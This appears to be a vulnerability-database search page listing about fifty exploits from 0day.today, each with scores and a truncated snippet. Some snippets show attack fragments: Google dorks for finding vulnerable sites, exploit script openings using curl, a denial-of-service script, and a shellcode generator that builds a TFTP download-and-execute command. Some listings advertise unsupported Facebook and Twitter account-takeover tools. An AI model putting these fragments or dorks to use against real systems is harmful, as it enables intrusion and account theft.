Lucene search
K
ZdtMost viewed

39001 matches found

0day.today
0day.today
•added 2012/03/30 12:0 a.m.•867 views

WeBID CSRF Vulnerability (All Version)

Exploit for php platform in category web applications Title : WeBID CSRF Vulnerability All Version Author : L3b-r1'z Date : 12.MAR.30 Security : LOW Google Dork : allintext: "powered by webid" Note : Works IF magicquotesgpc = off . P0C : Example Site : http://mcs-1.com/ http://usedwiiu.com/...

7.1AI score
Exploits0
0day.today
0day.today
•added 2024/10/30 12:0 a.m.•862 views

Xerox Printers Authenticated Remote Code Execution Vulnerability

Various Xerox printers, such as models EC80xx, AltaLink, VersaLink, and WorkCentre, suffer from an authenticated remote code execution vulnerability. ======================================================================= title: Authenticated Remote Code Execution product: Multiple Xerox printers...

7.2CVSS7.9AI score0.01214EPSS
Exploits2
0day.today
0day.today
•added 2022/09/08 12:0 a.m.•862 views

WordPress Twenty Seventeen 3.0 Cross-origin resource sharing information Vulnerability

Title: WordPress 6.0.2 - THEME - Twenty Seventeen: 3.0- CORS-Vulnerability Author: nu11secur1ty Vendor: https://wordpress.org/ Software: Twenty SeventeenVersion: 3.0 Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0 Description: The...

7.4AI score
Exploits0
0day.today
0day.today
•added 2021/10/25 12:0 a.m.•862 views

Hikvision Web Server Build 210702 - Command Injection Exploit

Exploit Title: Hikvision Web Server Build 210702 - Command Injection Exploit Author: bashis Vendor Homepage: https://www.hikvision.com/ Version: 1.0 CVE: CVE-2021-36260 Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html All credit to WatchfulIP...

9.8CVSS0.4AI score0.99869EPSS
Exploits23
0day.today
0day.today
•added 2012/09/26 12:0 a.m.•860 views

Samba 3.6.3 remote root exploit

Exploit for linux platform in category remote exploits =========================================================== == Subject: "root" credential remote code execution. == == CVE ID: CVE-2012-1182 == == Versions: Samba 3.0.x - 3.6.3 inclusive == == Summary: Samba 3.0.x to 3.6.3 are affected by a =...

7.1AI score0.74034EPSS
Exploits9
0day.today
0day.today
•added 2020/03/15 12:0 a.m.•857 views

Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution Exploit

Exploit for php platform in category web applications !/bin/sh if "$" -ne 4 ; then echo '! Usage: ' 1&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$mktemp" trap 'rm -f "$JAR"' EXIT echo "+ Logging in as $USERNAME:$PASSWORD" 1&2 curl -si -c "$JAR" "$BASE/login.php" \ -d...

7.5CVSS0.1AI score0.71728EPSS
Exploits5
0day.today
0day.today
•added 2009/09/21 12:0 a.m.•856 views

Winplot (.wp2 File) Local Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ================================================= Winplot .wp2 File Local Buffer Overflow Exploit ================================================= Author: Rick Software: http://math.exeter.edu/rparris/peanut/wp32z.exe Version: Compiled in 1...

6.8AI score
Exploits0
0day.today
0day.today
•added 2020/09/17 12:0 a.m.•853 views

Microsoft SQL Server Reporting Services 2016 - Remote Code Execution Exploit

Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution Google Dork: inurl:ReportViewer.aspx Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft SQL Server 2016 32-bit/x64 SP2 CU/GDR, Microsoft SQL Server 2014 32-bit/x64 SP3...

6.5CVSS8.2AI score0.98842EPSS
Exploits14
0day.today
0day.today
•added 2020/04/03 12:0 a.m.•853 views

Apache Solr 8.3.0 Velocity Template Remote Code Execution Exploit

This Metasploit module exploits a vulnerability in Apache Solr versions 8.3.0 and below which allows remote code execution via a custom Velocity template. Currently, this module only supports Solr basic authentication. From the Tenable advisory: An attacker could target a vulnerable Apache Solr...

7.5CVSS8.4AI score0.98567EPSS
Exploits12
0day.today
0day.today
•added 2019/12/06 12:0 a.m.•852 views

Verot 2.0.3 - Remote Code Execution Exploit #RCE

Exploit for php platform in category web applications Exploit Title: Verot 2.0.3 - Remote Code Execution Date: 2019-12-05 Exploit Author: Jinny Ramsmark Vendor Homepage: https://www.verot.net/phpclassupload.htm Software Link: https://github.com/verot/class.upload.php Version: '; $quality = "85";...

0.1AI score0.26184EPSS
Exploits7
0day.today
0day.today
•added 2018/10/13 12:0 a.m.•852 views

D-Link DSL-2640T Cross Site Scripting Vulnerability

Exploit for hardware platform in category web applications Exploit Title: Multiple XSS Vulnerabilities in D-Link DSL-2640T Exploit Author: Anas Falhi/m0ti0nl3ss ,https://anasfalhi.blogspot.com. Tested on: D-Link DSL-2640T Tags: xss, cross site scripting, D-Link DSL-2640T router POC: a!XSS via GET...

0.1AI score
Exploits0
0day.today
0day.today
•added 2008/06/24 12:0 a.m.•852 views

E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability

Exploit for unknown platform in category web applications ======================================================================== E-topbiz ViralDX 2.07 adclick.php bannerid SQL Injection Vulnerability ======================================================================== Viral DX 1 SQL Injecti...

7.1AI score
Exploits0
0day.today
0day.today
•added 2013/02/09 12:0 a.m.•851 views

phpVibe 3.1 Persistent XSS Vulnerability

This exploit allow attackers to inject script code in members list 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS,...

7.1AI score
Exploits0
0day.today
0day.today
•added 2017/04/16 12:0 a.m.•850 views

Microsoft Office / WordPad Remote Code Execution Vulnerability

Exploit for windows platform in category remote exploits CVE-2017-0199 Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API =================================================== Vulnerability description =================================================== A remote code executi...

9.3CVSS8.4AI score0.99933EPSS
Exploits29
0day.today
0day.today
•added 2009/11/09 12:0 a.m.•845 views

SSL MITM Vulnerability

Exploit for unknown platform in category remote exploits ====================== SSL MITM Vulnerability ====================== Title: SSL MITM Vulnerability CVE-ID: OSVDB-ID: Author: Pavel Kankovsky Published: 2009-11-09 Verified: yes view source print? include include include include include...

7.1AI score
Exploits0
0day.today
0day.today
•added 2018/08/30 12:0 a.m.•843 views

Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)

include include include include using namespace std; / Title: WoW64Egghunter for Windows 10 32bit apps on 64bit Windows 10 Size: 50 bytes Date: 26/08/2018 Author: n30m1nd - https://www.exploit-db.com/author/?a=8766 Works in: 32 bit processes on a 64 bit Windows 10 OS How to: Compile under Visual...

0.2AI score
Exploits0
0day.today
0day.today
•added 2020/02/26 12:0 a.m.•841 views

OpenSMTPD < 6.6.3p1 - Local Privilege Escalation / Remote Code Execution Exploit

/ LPE and RCE in OpenSMTPD's default install CVE-2020-8794 Copyright C 2020 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or at...

10CVSS0.4AI score0.889EPSS
Exploits10
0day.today
0day.today
•added 2017/09/25 12:0 a.m.•840 views

Supervisor XML-RPC Authenticated Remote Code Execution Exploit

This Metasploit module exploits a vulnerability in the Supervisor process control software, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending o...

9CVSS0.9AI score0.87544EPSS
Exploits10
0day.today
0day.today
•added 2023/11/24 12:0 a.m.•837 views

Moodle 4.3 Remote Code Execution 0day Exploit

Pre-authentication exploit affecting recent versions of Moodle. The exploit allow remote code execution, work with default installations and should not require any authentication or user interaction...

8.2AI score
Exploits0
0day.today
0day.today
•added 2022/03/01 12:0 a.m.•836 views

Hospital Patient Record Management System v1.0 SQL injection Vulnerability

Title: Hospital Patient Record Management System v1.0 SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Reference:...

9.8CVSS0.6AI score0.01613EPSS
Exploits2
0day.today
0day.today
•added 2021/11/20 12:0 a.m.•835 views

Apache Storm Nimbus 2.2.0 Command Execution Exploit

This Metasploit module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm. The getTopologyHistory RPC method method takes a single argument which is the name of a user which is concatenated into a string that is executed by bash. In ord...

9.8CVSS10.1AI score0.84489EPSS
Exploits4
0day.today
0day.today
•added 2006/09/07 12:0 a.m.•834 views

PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications ======================================================================== PhotoKorn Gallery 1.52 dirpath Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi...

7.1AI score
Exploits0
0day.today
0day.today
•added 2010/09/28 12:0 a.m.•832 views

network411 (Product.asp?intProdID) SQL Injection Vulnerability

Exploit for php platform in category web applications ============================================================== network411 Product.asp?intProdID SQL Injection Vulnerability ============================================================== Author : Shamus Location : Solo && Jogjakarta, Indonesia...

7.1AI score
Exploits0
0day.today
0day.today
•added 2022/02/02 12:0 a.m.•829 views

Mozilla Firefox 67 - Array.pop JIT Type Confusion Exploit

Exploit Title: Mozilla Firefox 67 - Array.pop JIT Type Confusion Type: RCE Platform: Windows Exploit Author: deadlock Forrest Orr Author Homepage: https://forrest-orr.net Vendor Homepage: https://www.mozilla.org/en-US/ Software Link: https://ftp.mozilla.org/pub/firefox/releases/65.0.1/win64/en-US...

10CVSS8.4AI score0.55874EPSS
Exploits19
0day.today
0day.today
•added 2019/08/02 12:0 a.m.•828 views

Sar2HTML 3.2.1 - Remote Command Execution Exploit

Exploit for php platform in category web applications Exploit Title: sar2html Remote Code Execution Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application y...

7.4AI score
Exploits0
0day.today
0day.today
•added 2022/06/09 12:0 a.m.•830 views

Atlassian Confluence Namespace OGNL Injection Exploit

This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution. This module requires Metasploit: https://metasploit.com/download Current source:...

9.8CVSS0.4AI score0.99999EPSS
Exploits116
0day.today
0day.today
•added 2012/09/14 12:0 a.m.•823 views

Joomla Component com_fabrik File Upload Vulnerability

Exploit for php platform in category web applications $ $ +================================================= ================+ | Joomla Component comFabrik Remote Shell Upload Vulnerability | +================================================= ================+ Google Dork :...

7.1AI score
Exploits0
0day.today
0day.today
•added 2019/05/20 12:0 a.m.•821 views

GetSimpleCMS - Unauthenticated Remote Code Execution Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "GetSimpleCMS Unauthenticated RCE", 'Description' = %q This module exploits a vulnerability found in GetSimpleCMS, which allows unauthenticated...

9.8CVSS0.2AI score0.71598EPSS
Exploits5
0day.today
0day.today
•added 2014/04/19 12:0 a.m.•819 views

Opencart <= 1.5.6.3 Upload Shell Vulnerability

Exploit for php platform in category web applications Exploit Title: Opencart Downloads and upload file This trick works by renaming the error log file from error.txt to error.php or whatever.php and make an wrong sql query in order to log it 1.Go to System - Settings - Edit Your Store - Server T...

7.1AI score
Exploits0
0day.today
0day.today
•added 2016/03/14 12:0 a.m.•818 views

Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)

Exploit for linux platform in category dos / poc Linux snd-usb-audio Multiple Free Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes...

4.9CVSS6.8AI score0.01946EPSS
Exploits2
0day.today
0day.today
•added 2021/11/27 12:0 a.m.•816 views

ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit

This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service. This module requires Metasploit:...

9.8CVSS9.5AI score0.9896EPSS
Exploits8
0day.today
0day.today
•added 2020/07/07 12:0 a.m.•814 views

MikroTik RouterOS Null Pointer Dereference / Division-By-Zero Vulnerability

MikroTik RouterOS versions prior to stable 6.47 suffer from multiple null pointer dereference vulnerabilities and one division-by-zero vulnerability. MikroTik RouterOS Null Pointer Dereference / Division-By-Zero Vulnerability Details ======= Product: MikroTik's RouterOS Affected Versions: through...

7.2AI score
Exploits0
0day.today
0day.today
•added 2023/10/08 12:0 a.m.•812 views

glibc ld.so Local Privilege Escalation Vulnerability

Dubbed Looney Tunables, Qualys discovered a buffer overflow vulnerability in the glibc dynamic loader's processing of the GLIBCTUNABLES environment variable. This vulnerability was introduced in April 2021 glibc 2.34 by commit 2ed18c. Looney Tunables: Local Privilege Escalation in the glibc's ld....

7.8CVSS8.5AI score0.81422EPSS
Exploits37
0day.today
0day.today
•added 2017/12/29 12:0 a.m.•812 views

pfSense 2.1.3-RELEASE (amd64) Remote Command Execution Exploit

pfSense, a free BSD based open source firewall distribution, versions 2.2.6 and below contain a remote command execution vulnerability post authentication in the rrdgraphimg.php page. The vulnerability occurs via the graph GET parameter. A non-administrative authenticated attacker can inject...

7.8AI score
Exploits0
0day.today
0day.today
•added 2016/12/26 12:0 a.m.•812 views

PHPMailer 5.2.17 - Remote Code Execution Exploit

Exploit for php platform in category web applications !/bin/bash CVE-2016-10033 exploit by opsxcq https://github.com/opsxcq/exploit-CVE-2016-10033 echo '+ CVE-2016-10033 exploit by opsxcq' if -z "$1" then echo '- Please inform an host as parameter' exit -1 fi host=$1 echo '+ Exploiting '$host cur...

7.5CVSS9.4AI score0.99714EPSS
Exploits58
0day.today
0day.today
•added 2020/03/30 12:0 a.m.•811 views

Microsoft Windows 10 (1903/1909) - (SMBGhost) SMB3.1.1 Local Privilege Escalation Exploit

Microsoft Windows 10 1903/1909 - 'SMBGhost' SMB3.1.1 'SMB2COMPRESSIONCAPABILITIES' Local Privilege Escalation CVE-2020-0796 Windows SMBv3 LPE Exploit Authors Daniel García Gutiérrez @danigargu Manuel Blanco Parajón @dialluvioso References...

10CVSS0.4AI score0.9981EPSS
Exploits125
0day.today
0day.today
•added 2018/01/18 12:0 a.m.•809 views

Primefaces 5.x - Remote Code Execution Exploit

Exploit for java platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module...

7.2CVSS7.1AI score0.94104EPSS
Exploits13
0day.today
0day.today
•added 2024/11/18 12:0 a.m.•808 views

Pyload Remote Code Execution Exploit

CVE-2024-28397 is a sandbox escape in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape...

9.8CVSS6.8AI score0.16513EPSS
Exploits22
0day.today
0day.today
•added 2020/10/07 12:0 a.m.•807 views

Facebook steal Group 0day Exploit

Exploit can steal facebook Group and delete the old administrator and create a new administrator...

2.2AI score
Exploits0
0day.today
0day.today
•added 2024/07/17 12:0 a.m.•806 views

OpenSSH 9.6 Remote Code Execution Exploit

OpenSSH version 9.6, which allows for command injection and remote code execution RCE. Exploit posing a significant risk to systems running the affected version...

8.7AI score
Exploits0
0day.today
0day.today
•added 2019/11/09 12:0 a.m.•805 views

Android Janus - APK Signature Bypass Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/payload/apk' class MetasploitModule "Android Janus APK Signature bypass", 'Description' = %q This module exploits CVE-2017-13156 in Android to install ...

7.8CVSS7.7AI score0.20089EPSS
Exploits9
0day.today
0day.today
•added 2019/02/06 12:0 a.m.•803 views

Cisco ISE 2.4.0 XSS / Remote Code Execution Exploit

Cisco Identity Services Engine ISE version 2.4.0 suffers from cross site scripting, java deserialization, and in conjunction can lead to remote code execution. Full exploit provided. Multiple vulnerabilities in Cisco Identity Services Engine Unauth XSS to RCE as root Discovered by Pedro Ribeiro...

7.5CVSS8.5AI score0.21274EPSS
Exploits4
0day.today
0day.today
•added 2019/11/19 12:0 a.m.•798 views

Microsoft Windows 7 (x86) - (BlueKeep) RDP Remote Windows Kernel Use After Free Exploit

EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload: times = 10000 count = 0 while count times: count += 1 print'time through %d' % count try:...

10CVSS10AI score0.99999EPSS
Exploits123
0day.today
0day.today
•added 2019/11/12 12:0 a.m.•797 views

Microsoft Edge 44.18362.449.0 - Denial Of Service Exploit

function blah var buff = '\x41'; var buffer = buff.repeat600000000; document.writebuffer;...

0.2AI score
Exploits0
0day.today
0day.today
•added 2022/05/12 12:0 a.m.•796 views

Cisco RV340 SSL VPN Unauthenticated Remote Code Execution Exploit

This Metasploit module exploits a stack buffer overflow in the Cisco RV series router's SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet! The stack is executable and no ASLR is in place, which makes exploitation...

10CVSS10AI score0.72458EPSS
Exploits7
0day.today
0day.today
•added 2022/02/23 12:0 a.m.•790 views

Twitter reset account Private Method 0day Exploit

Twitter reset any Account Private Method Exploit...

7.1AI score
Exploits0
0day.today
0day.today
•added 2019/01/12 12:0 a.m.•789 views

Windows/x86 - Download With TFTP And Execute Shellcode (Generator) (51-60 bytes)

!/bin/python Author: Semen Alexandrovich Lyhin. https://www.linkedin.com/in/semenlyhin/ This script generates x86 shellcode to download and execute .exe file via tftp. File name should be equal to: "1.exe" Lenght: 51-56 bytes, zero-free. import sys def GetOpcodesip,addr: command = r"tftp -i " + i...

7.4AI score
Exploits0
0day.today
0day.today
•added 2023/03/02 12:0 a.m.•788 views

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload Exploit

This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in order to gain remote code execution as the oracle user. This module requires Metasploit:...

9.8CVSS0.1AI score0.98342EPSS
Exploits7
0day.today
0day.today
•added 2024/11/24 12:0 a.m.•784 views

needrestart Local Privilege Escalation Vulnerability

LPEs in needrestart CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003 ======================================================================== Contents ======================================================================== Summary Background CVE-2024-48990 and...

7.8CVSS6.9AI score0.19924EPSS
Exploits16
0day.today
0day.today
•added 2024/05/15 12:0 a.m.•782 views

Cacti 1.2.26 Remote Code Execution Vulnerability

---------------------------------------------------------------- Cacti = 1.2.26 import.php Remote Code Execution Vulnerability ---------------------------------------------------------------- - Software Link: https://cacti.net - Affected Versions: Version 1.2.26 and prior versions. - Vulnerabilit...

9.1CVSS7.1AI score0.86303EPSS
Exploits17
Total number of security vulnerabilities5000